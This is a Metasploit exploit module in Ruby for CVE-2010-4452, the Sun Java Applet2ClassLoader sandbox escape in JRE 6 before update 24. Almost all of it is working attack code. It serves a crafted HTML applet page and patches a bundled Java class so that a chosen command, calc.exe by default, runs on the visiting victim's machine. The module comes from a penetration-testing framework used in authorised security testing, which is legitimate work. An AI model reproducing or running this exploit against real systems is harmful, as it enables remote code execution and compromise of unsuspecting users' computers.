Sun Java Applet2ClassLoader Remote Code Execution Exploit

`##  
# $Id: java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
require 'rex'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize( info = {} )  
super( update_info( info,  
'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',  
'Description' => %q{  
This module exploits a vulnerability in Java Runtime Environment  
that allows an attacker to escape the Java Sandbox. By supplying a   
codebase that points at a trusted directory and a code that is a URL that  
does not contain an dots an applet can run without the sandbox.  
  
The vulnerability affects version 6 prior to update 24.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Frederic Hoguin', # Discovery, PoC  
'jduck' # Metasploit module  
],  
'Version' => '$Revision: 11983 $',  
'References' =>  
[  
[ 'CVE', '2010-4452' ],  
# [ 'OSVDB', '' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],  
[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],  
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]  
],  
'Platform' => [ 'java', 'win' ],  
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },  
'Targets' =>  
[  
# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23  
# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23  
[ 'Automatic (no payload)', { } ]  
=begin  
[ 'Windows x86',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'win',  
}  
],  
[ 'Generic (Java Payload)',  
{  
'Arch' => ARCH_JAVA,  
'Platform' => 'java',  
}  
],  
=end  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Feb 15 2011'  
))  
  
register_options(  
[  
OptString.new('CMD', [ false, "Command to run.", "calc.exe"]),  
OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)",  
"C:\\Program Files\\java\\jre6\\lib\\ext"]),  
], self.class)  
end  
  
def exploit  
path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)  
@java_class = nil  
File.open(path, "rb") { |fd|  
@java_class = fd.read(fd.stat.size)  
}  
if not @java_class  
raise RuntimeError, "Unable to load java class"  
end  
  
super  
end  
  
def on_request_uri(cli, request)  
#print_status("Received request: #{request.uri}")  
  
jpath = get_uri(cli)  
#print_status(jpath)  
  
# Do what get_uri does so that we can replace it in the string  
host = Rex::Socket.source_address(cli.peerhost)  
host_num = Rex::Socket.addr_aton(host).unpack('N').first  
  
codebase = "file:" + datastore['LIBPATH']  
code_url = jpath.sub(host, host_num.to_s)  
  
cmd = datastore['CMD']  
cmd_off = 0xb4  
  
cn_off = 0xfc  
  
case request.uri  
  
when /\.class$/  
#p = regenerate_payload(cli)  
  
print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")  
  
cls = @java_class.dup  
cls[cmd_off,2] = [cmd.length].pack('n')  
cls[cmd_off+2,8] = cmd  
  
cn_off += (cmd.length - 8) # the original length was 8 (calc.exe)  
cls[cn_off,2] = [code_url.length].pack('n')  
cls[cn_off+2,7] = code_url  
  
#File.open('ughz.class', 'wb') { |fd| fd.write cls }  
  
send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })  
handler(cli)  
  
else  
html = <<-EOS  
<html>  
<body>  
<applet codebase="#{codebase}" code="#{code_url}" />  
</body>  
</html>  
EOS  
print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, html)  
handler(cli)  
end  
  
end  
  
end  
`